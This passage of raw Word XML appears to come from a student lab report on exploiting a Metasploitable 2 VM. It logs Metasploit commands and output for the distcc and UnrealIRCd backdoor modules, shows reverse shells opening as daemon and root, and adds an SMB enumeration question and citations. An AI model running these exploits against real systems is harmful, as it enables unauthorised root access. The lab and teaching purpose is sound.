          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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exploit(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">distcc_exec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) &gt; set rhost 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">rhost =&gt; 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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exploit(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">distcc_exec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) &gt; exploit</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Started reverse TCP double handler on 10.0.2.15:4444 </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Accepted the first client connection...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Accepted the second client connection...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Command: echo CaUN5t9UINtfPwEe;</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Writing to socket A</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Writing to socket B</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Reading from sockets...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Reading from socket B</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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B: "CaUN5t9UINtfPwEe\r\n"</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Matching...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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A is input...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Command shell session 1 opened (10.0.2.15:4444 -&gt; 10.0.2.4:49736) at 2017-02-20 21:46:52 -0700</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">id</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">uid=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ifconfig</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">eth0      Link encap:Ethernet  HWaddr 08:00:27:3e:5b:40  </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet addr:10.0.2.4  Bcast:10.0.2.255  Mask:255.255.255.0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet6 addr: fe80::a00:27ff:fe3e:5b40/64 Scope:Link</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX packets:1461 errors:0 dropped:0 overruns:0 frame:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          TX packets:1336 errors:0 dropped:0 overruns:0 carrier:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX bytes:125285 (122.3 KB)  TX bytes:98684 (96.3 KB)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          Base address:0xd010 Memory:f0000000-f0020000 </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">lo        Link encap:Local Loopback  </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet addr:127.0.0.1  Mask:255.0.0.0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet6 addr: ::1/128 Scope:Host</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          UP LOOPBACK RUNNING  MTU:16436  Metric:1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX packets:508 errors:0 dropped:0 overruns:0 frame:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          TX packets:508 errors:0 dropped:0 overruns:0 carrier:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:0 </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX bytes:223589 (218.3 KB)  TX bytes:223589 (218.3 KB)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">﻿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color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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&gt; use exploit/unix/irc/unreal_ircd_3281_backdoor </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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exploit(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unreal_ircd_3281_backdoor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) &gt; set rhost 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">rhost =&gt; 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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exploit(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unreal_ircd_3281_backdoor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) &gt; exploit</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Started reverse TCP double handler on 10.0.2.15:4444 </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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10.0.2.4:6667 - Connected to 10.0.2.4:6667...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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10.0.2.4:6667 - Sending backdoor command...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Accepted the first client connection...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Accepted the second client connection...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Command: echo f9FdWe10jZOeOO0R;</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Writing to socket A</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Writing to socket B</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Reading from sockets...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Reading from socket B</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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B: "f9FdWe10jZOeOO0R\r\n"</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Matching...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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A is input...</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]</w:t>
      </w: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 Command shell session 1 opened (10.0.2.15:4444 -&gt; 10.0.2.4:39082) at 2017-02-20 18:07:16 -0700</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">id</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ifconfig</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">eth0      Link encap:Ethernet  HWaddr 08:00:27:3e:5b:40  </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet addr:10.0.2.4  Bcast:10.0.2.255  Mask:255.255.255.0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet6 addr: fe80::a00:27ff:fe3e:5b40/64 Scope:Link</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX packets:220 errors:0 dropped:0 overruns:0 frame:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          TX packets:248 errors:0 dropped:0 overruns:0 carrier:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX bytes:33707 (32.9 KB)  TX bytes:32247 (31.4 KB)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          Base address:0xd010 Memory:f0000000-f0020000 </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">lo        Link encap:Local Loopback  </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet addr:127.0.0.1  Mask:255.0.0.0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          inet6 addr: ::1/128 Scope:Host</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          UP LOOPBACK RUNNING  MTU:16436  Metric:1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX packets:240 errors:0 dropped:0 overruns:0 frame:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          TX packets:240 errors:0 dropped:0 overruns:0 carrier:0</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:0 </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">          RX bytes:91669 (89.5 KB)  TX bytes:91669 (89.5 KB)</w:t>
        <w:br w:type="textWrapping"/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color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3) The exploit for that share allows another kind of enumeration.  What kind is it, and how would you execute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﻿Cited Works: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Hdmoore. "Metasploitable 2 Exploitability Guide." </w:t>
      </w:r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t xml:space="preserve">Rapid7 Community and Blog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. N.p., 25 Mar. 2014. Web. 21 Feb. 2017.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"SMB enumeration with Kali Linux : enum4linux,acccheck &amp; smbmap." </w:t>
      </w:r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t xml:space="preserve">Hackercool.......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N.p., 20 July 2016. Web. 21 Feb. 2017.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"Control – smb 445, 137, 139." </w:t>
      </w:r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t xml:space="preserve">Myexploit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. N.p., 20 Sept. 2016. Web. 21 Feb. 2017.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"What is hidden share?" </w:t>
      </w:r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t xml:space="preserve">What is hidden share?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N.p., n.d. Web. 21 Feb. 2017.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"Brute Forcing Passwords with ncrack, hydra and medusa." </w:t>
      </w:r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t xml:space="preserve">HackerTarget.com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. N.p., 07 Dec. 2016. Web. 21 Feb. 2017.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